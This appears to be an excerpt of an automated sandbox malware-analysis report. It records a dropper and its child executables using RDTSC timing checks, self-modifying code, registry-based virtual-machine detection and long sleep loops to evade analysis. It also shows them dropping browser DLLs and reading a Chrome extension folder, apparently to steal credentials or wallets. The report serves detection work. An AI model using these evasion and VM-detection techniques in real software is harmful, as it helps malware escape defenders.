Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 506761 second address: 5067B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 jmp 00007FD180B5C163h 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 jmp 00007FD180B5C162h 0x00000017 pop eax 0x00000018 mov edx, dword ptr [ebp+122D2C93h] 0x0000001e lea ebx, dword ptr [ebp+1245B3C8h] 0x00000024 jg 00007FD180B5C15Ch 0x0000002a push eax 0x0000002b push ebx 0x0000002c jnc 00007FD180B5C15Ch 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 506826 second address: 5068AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jo 00007FD1807ED557h 0x0000000e pushad 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 jmp 00007FD1807ED54Dh 0x00000016 popad 0x00000017 nop 0x00000018 pushad 0x00000019 call 00007FD1807ED54Fh 0x0000001e mov ecx, dword ptr [ebp+122D2A17h] 0x00000024 pop edi 0x00000025 mov esi, eax 0x00000027 popad 0x00000028 push 00000000h 0x0000002a mov ecx, eax 0x0000002c mov edx, dword ptr [ebp+122D2C5Fh] 0x00000032 call 00007FD1807ED549h 0x00000037 jmp 00007FD1807ED54Dh 0x0000003c push eax 0x0000003d jmp 00007FD1807ED54Eh 0x00000042 mov eax, dword ptr [esp+04h] 0x00000046 jmp 00007FD1807ED550h 0x0000004b mov eax, dword ptr [eax] 0x0000004d push eax 0x0000004e push edx 0x0000004f jnc 00007FD1807ED548h 0x00000055 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 5068AF second address: 5068BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007FD180B5C156h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 5068BA second address: 50694D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b jno 00007FD1807ED550h 0x00000011 pop eax 0x00000012 push 00000000h 0x00000014 push ebx 0x00000015 call 00007FD1807ED548h 0x0000001a pop ebx 0x0000001b mov dword ptr [esp+04h], ebx 0x0000001f add dword ptr [esp+04h], 00000017h 0x00000027 inc ebx 0x00000028 push ebx 0x00000029 ret 0x0000002a pop ebx 0x0000002b ret 0x0000002c push 00000003h 0x0000002e push 00000000h 0x00000030 push ebx 0x00000031 call 00007FD1807ED548h 0x00000036 pop ebx 0x00000037 mov dword ptr [esp+04h], ebx 0x0000003b add dword ptr [esp+04h], 00000014h 0x00000043 inc ebx 0x00000044 push ebx 0x00000045 ret 0x00000046 pop ebx 0x00000047 ret 0x00000048 pushad 0x00000049 mov edi, dword ptr [ebp+122D33EDh] 0x0000004f or dword ptr [ebp+122D3543h], edi 0x00000055 popad 0x00000056 mov ecx, dword ptr [ebp+122D2CCFh] 0x0000005c push 00000000h 0x0000005e or ecx, dword ptr [ebp+122D322Ch] 0x00000064 push 00000003h 0x00000066 jmp 00007FD1807ED551h 0x0000006b push B5C169CDh 0x00000070 push eax 0x00000071 push edx 0x00000072 push ecx 0x00000073 push ebx 0x00000074 pop ebx 0x00000075 pop ecx 0x00000076 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 50694D second address: 506953 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 506953 second address: 506957 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 506957 second address: 5069B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD180B5C166h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xor dword ptr [esp], 75C169CDh 0x00000012 call 00007FD180B5C15Bh 0x00000017 mov dl, bh 0x00000019 pop edi 0x0000001a lea ebx, dword ptr [ebp+1245B3D3h] 0x00000020 jng 00007FD180B5C15Ch 0x00000026 xchg eax, ebx 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007FD180B5C168h 0x00000030 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 5069B7 second address: 5069BD instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 5069BD second address: 5069D8 instructions: 0x00000000 rdtsc 0x00000002 js 00007FD180B5C15Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e jl 00007FD180B5C156h 0x00000014 pop edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 527B79 second address: 527B84 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 527B84 second address: 527B90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FD180B5C156h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 5263BB second address: 5263D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD1807ED54Dh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 5263D1 second address: 5263D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 526534 second address: 52653D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 52681F second address: 526825 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 52697A second address: 526984 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FD1807ED546h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	Special instruction interceptor: First address: 46DE32 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	Special instruction interceptor: First address: 495BDC instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	Special instruction interceptor: First address: 475FCC instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	Special instruction interceptor: First address: 4FBE20 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Special instruction interceptor: First address: 52DE32 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Special instruction interceptor: First address: 555BDC instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Special instruction interceptor: First address: 535FCC instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Special instruction interceptor: First address: 5BBE20 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\RoamingHJDBKJKFIE.exe	Special instruction interceptor: First address: E4DE32 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\RoamingHJDBKJKFIE.exe	Special instruction interceptor: First address: E75BDC instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\RoamingHJDBKJKFIE.exe	Special instruction interceptor: First address: E55FCC instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\RoamingHJDBKJKFIE.exe	Special instruction interceptor: First address: EDBE20 instructions caused by: Self-modifying code
Source: C:\Users\userKFHCAEGCBF.exe	Special instruction interceptor: First address: C7EA4F instructions caused by: Self-modifying code
Source: C:\Users\userKFHCAEGCBF.exe	Special instruction interceptor: First address: C7C64E instructions caused by: Self-modifying code
Source: C:\Users\userKFHCAEGCBF.exe	Special instruction interceptor: First address: C7E993 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Special instruction interceptor: First address: 1CEA4F instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Special instruction interceptor: First address: 1CC64E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Special instruction interceptor: First address: 1CE993 instructions caused by: Self-modifying code

Contains capabilities to detect virtual machines

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\Desktop\8NjcvPNvUr.exe

Code function: 0_2_04C80CC5 rdtsc

0_2_04C80CC5

Contains long sleeps (>= 3 min)

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Thread delayed: delay time: 180000

Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window / User API: threadDelayed 1719	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window / User API: threadDelayed 1512	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window / User API: threadDelayed 1563	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window / User API: threadDelayed 1466	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Window / User API: threadDelayed 1642	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Window / User API: threadDelayed 943	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Window / User API: threadDelayed 812	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Window / User API: threadDelayed 499
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Window / User API: threadDelayed 1077
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Window / User API: threadDelayed 506
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Window / User API: threadDelayed 627

Found dropped PE file which has not been started or loaded

Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file

Found large amount of non-executed APIs

Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe

API coverage: 2.5 %

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7908	Thread sleep count: 56 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7908	Thread sleep time: -112056s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7916	Thread sleep count: 50 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7916	Thread sleep time: -100050s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7876	Thread sleep count: 337 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7876	Thread sleep time: -10110000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7912	Thread sleep count: 54 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7912	Thread sleep time: -108054s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7896	Thread sleep count: 1719 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7896	Thread sleep time: -3439719s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7904	Thread sleep count: 1512 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7904	Thread sleep time: -3025512s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7900	Thread sleep count: 1563 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7900	Thread sleep time: -3127563s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7892	Thread sleep count: 1466 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7892	Thread sleep time: -2933466s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7996	Thread sleep time: -180000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe TID: 6688	Thread sleep count: 103 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe TID: 6688	Thread sleep time: -618000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe TID: 5460	Thread sleep count: 499 > 30
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe TID: 5460	Thread sleep count: 1077 > 30
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe TID: 5460	Thread sleep count: 506 > 30
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe TID: 3352	Thread sleep count: 97 > 30
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe TID: 3352	Thread sleep time: -582000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe TID: 4164	Thread sleep count: 270 > 30
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe TID: 4164	Thread sleep count: 167 > 30
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe TID: 4164	Thread sleep count: 627 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 4456	Thread sleep time: -300000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 4456	Thread sleep time: -30000s >= -30000s

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Last function: Thread delayed

Sleep loop found (likely to delay execution)

Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Thread sleep count: Count: 1642 delay: -10			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Thread sleep count: Count: 1077 delay: -10

Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior
Source: C:\Users\userKFHCAEGCBF.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe

Code function: 8_2_6C1DC930 GetSystemInfo,VirtualAlloc,GetSystemInfo,VirtualFree,VirtualAlloc,

8_2_6C1DC930

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Thread delayed: delay time: 180000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread delayed: delay time: 30000

Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: 3Windows 2012 Server Standard without Hyper-V (core)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 11 Essential Server Solutions without Hyper-V
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: #Windows 10 Microsoft Hyper-V Server
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 8.1 Microsoft Hyper-V Server
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 2012 Server Standard without Hyper-V
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 8 Microsoft Hyper-V Server
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: 3Windows 11 Server Enterprise without Hyper-V (full)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: 5Windows 2012 Server Datacenter without Hyper-V (core)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: 3Windows 2016 Server Standard without Hyper-V (core)
Source: 1c593ec106.exe, 0000001F.00000002.2936767105.00000000020D7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 8.1 Server Standard without Hyper-V (core)
Source: firefox.exe, 00000018.00000002.2626428785.00000238E8EA0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWi
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: 3Windows 11 Server Enterprise without Hyper-V (core)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: (Windows 2012 R2 Microsoft Hyper-V Server
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: 6Windows 2012 R2 Server Standard without Hyper-V (core)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 11 Microsoft Hyper-V Server
Source: 8ec8c5c339.exe, 0000001E.00000002.2781993331.00000000026C0000.00000040.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware=z
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 2012 R2 Server Standard without Hyper-V
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 8 Server Datacenter without Hyper-V (core)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 10 Server Datacenter without Hyper-V (core)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: 0Windows 8 Server Standard without Hyper-V (core)
